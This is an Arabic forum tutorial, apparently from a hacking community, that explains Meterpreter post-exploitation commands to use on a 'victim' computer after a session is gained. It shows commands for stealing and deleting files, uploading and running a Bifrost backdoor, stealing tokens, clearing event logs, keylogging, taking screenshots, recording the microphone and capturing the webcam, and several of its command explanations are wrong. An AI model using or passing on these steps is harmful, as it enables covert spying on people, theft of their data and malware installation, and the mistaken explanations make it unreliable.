ما بعـد وصول session في meterpreter

السلام عليكم و رحمة الله و بركاتة
كيف حال كل اعضاء الديف بوينت؟
انا قررت في هذا الدرس الرد على الاخ موجود والدرس هو ما بعد الوصول الىsession في meterpreter
نكتب الامر هذا عشان تضهر لنا خصائص الميتيربريتير
كود: meterpreter > help

راح تظهر لنا اوامر كثيره ان شاء الله نشرحها كلها
مجموعات ، في كل مجموعة اوامر
المجموعة الاولى :
Core Commands: و يعني بها اوامر اساسية يعني اوامر العودة الى الخلف اوامر اغلاق اوامر مساعدة
طيب نشرحها
كود:

امر مساعدة مثل الامر الي طبقناه فوق help
background العودة الى الخلف من الجلسة الى meterpreter
bgkill يقتل اي برنامج مشغل في meterpreter
bglist يطلع لك البرامج الي شغاله في meterpreter
bgrun يشغل لك البرامج الي حطيتها في meterpreter
channel يعطيك معلومات حول القنوات الي شغاله
close يستخدم بأقفال اي قناة مشغلها انت
exit لأغلاق او حذف الجلسة
help نفس اول امر و هو طلب مساعدة او استخراج الاوامر
info هذا الامر يستخدم لاستخراج معلومات حول اي موديل مشغله انت
interact هذا لو تريد تتفاعل مع قناة مشغلها تستخدمة
migrate هذا يلعب بالبروسس يعني تقدر من خلاله تخفي الباكدور او البايلود من الامر هذا
quit هذا الامر لانهاء الجلسة
read هذا للقرائة يستخدم
run هذا يستخدم لتشغيل اي سكربت تركبة او برنامج او قناة
use هذا الامر معروف بالميتا و هو معناة استخدم
write هذا للكتابة لوتريد ان تكتب شي في قناة تستخدمة

و هذا الامر يستخدم لتحميل الملفات الى جهاز المهاجم ، يعني اذا اردت تاخذ ملف من جهاز الضحية تستخدم الامر هذا و لنفرض اسم الملف IO.SYS نكتب له الامر التالي
كود:

meterpreter > download IO.SYS[*] downloading: IO.SYS -> IO.SY
المجموعة الثانية:
File system Command: هذي اوامر ملفات النظام يعني الاوامر هذي مهمه جداً هي تستخدم للرفع و التحميل و الانتقال و الحذف و لأهميتها راح اشرح كل امر فيها
الامر الاول :
كود c cat
و هذا معروف للقرائة ، مثلاً تريد قرائة ملف txt تكتب النفرض اسم الملف arhaby.txt نكتب الامر التالي لقرائتة
كود: meterpreter > cat arhaby.txt
الامر الثاني :
كودcdو هذا الامر يستخدم للتنقل يعني لا بغيت تنتقل الى مجلد السي C تكتب الامر التالي
كود:
meterpreter > cd C:
الامر الثالث :
كود:
del
هذا الامر يستخدم للحذف ، اذا اردت تحذف مجلد مثلاً اسمه zorax***** تمتب الامر التالي
كود:
meterpreter > del zorax*****

الامر الرابع :
كود:
download


الامر الخامس :
كود:

edit


و هذا معروف من اسمه و هو لتعديل الملفات الموجودة بجهاز الضحية
يعني ا ردت تعدل على مجلد اسمه dev-point.SYS تكتب الامر التالي
كود:
meterpreter > edit dev-point.SYS

الامر السادس :
كود:
getlwd


هذا الامر يخبرك انت وين في جهازك انت ، يعني المهاجم يسأل meterpreter وين انا ؟
والسؤال يكون عن طريق الامر التالي
كود:
meterpreter > getlwd /root


الامر السابع :
كود:
getwp


هذا الامر نفس الامر الي فوق لكن المهاجم يسأل اين انا في جهاز ضحيتي ؟
و السؤال يكون عن طريق الامر التالي
كود:
meterpreter > getwd
C:********s and SettingsarhabyDesktop


الامر الاخير :
كود:
upload


و هذا الامر يستخدم لرفع الملفات في جهاز الضحية ، يعني اذا اخترقت الضحية و لا تريد ان تستخدم الاوامر تريد ان ترفع له باتش بيفروست تكتب له الامر التالي
[/size]meterpreter > upload jordan-hacker***** -> C:[*] uploading : jordan-hacker***** -> C:[*] uploaded : jordan-hacker***** -> C:jordan-hacker*****

:jordan-hacker*****

امر تشغيل السيرفر

الكود:

start jordan-hacker.exe

هذه المجموعة الاولى الان سأتكلم عن المجموعة الثانية:
Networking Commands : و تعني بها اوامر الشبكات يعني استخراج اي بي الضحية في جهازه و البورتات هي ثلاث اوامر لنشرحها
كود:
ipconfig هذا الامر زي ifconfig في نظام ليونكس لكن في الوندوز نكتب الامر ipconfig و هو يخرج لنا الاي بي داخل الشبكة portfwd هذا يستخدم لتوجية المنافذ او البورتات
route هذا يعرض لك التوجيهات و تقدر تعدلها من خلالة ولا انصح باستخدامها لانه ممكن تطير عليك الضحية

المجموعة الرابعة :
System Commands : و يعني بها اوامر النظام ، مثل يعني يطلع لك البروسس وش شغال بالجهاز ووو الـخ .........
طيب نشرحها
كود:

clearev هذا يطلع لك الاحداث في جهاز الضحية
drop_token هذا الامريطلع لك على اي يوزر شغال انت في جهاز الضحية .
execute هذا الامر زي ما كأنك ماسك جهاز الضحية و تروح الى ابدأ ثم تروح تشغيل و بعدها تكتب cmd يعني تروح لسطر اوامر الضحية من جهازة
getpid عيطيك معلومات عن العمليات الي تبي تعرف عنها انت
getprivs يعطيك اكبر عدد من الامتيازات
getuid هذا بعد يعلمك على اي يوزر انت الحين في جهاز الضحية
kill هذا يستخدم لقتل العمليات في البروسس
ps هذا الامر يستعرض لك البروسس
reboot يعيد تشغيل جهاز الضحية
reg هذا الامرللتعديل لجهاز الضحية مع الاتصال البعيد ، يعني اذا مقفله تفتحه عن طريق الامر ، و الله اعلم
rev2self و هذا الامر يستخدم للاتصال البعيد مع الضحية ، يعني ما بعد الامر الي قبلة
****************l هذا نفس المر الاكس كيوت
shutdown هذا ايقاف تشغيل الكميوتر بعد
steal_token هذا الامر يحاول يسرق رمز تمثيل من العمليات الي شغاله في البروسس

المجموعة الخامسة :
كود:
هذا الامر اذا كان الجهاز مدير على عدة اجهزه ، الامر هذا يستخرج الاجهزة الي فيه [size=24]enumdesktops
getdesktop هذا الامر يطلع لك سطح المكتب تبع الضحية في meterpreter الي تستخدمة انت
keyscan_dump الامر هذا بعد ما تكتب الامر الي تحته يطلع لك كيلجور الضحية يعني تتابع الكيلجور عن طريق
keyscan_start ليتشغيل الكيلجور
keyscan_stop لأيقاف الكيلجور
screenshot يصور جهاز الضحية
setdesktop هذا الامر يستخدم اذا الضحية معه اكثر من سطح مكتب ، من خلال الامر هذا تتنقل في سطوح المكتب الخاصه فيه
uictl

المجموعة السادسة :
cam Commands : هذي المجموعة تتكون من ثلاث اوامر امر لتشغيل المايك ، يعني تسمع الضحية من خلال المايك عندة ، و الامر الثاني و الثالث للكام الخاص بالضحية

كود
record_mic هذ الامر للاستماع الى مايك الضحية
cam_list هذا يطلع لك الكامات الموجودة في جهاز الضحية
cam_snap هذا الامر يستخدم بعد الامر الي قبله يعني الامر الي قبله يطلع لك الكامات و يرقمها و هذا تكتب الامر و بعده تكتب رقم الكام عشان يشتغل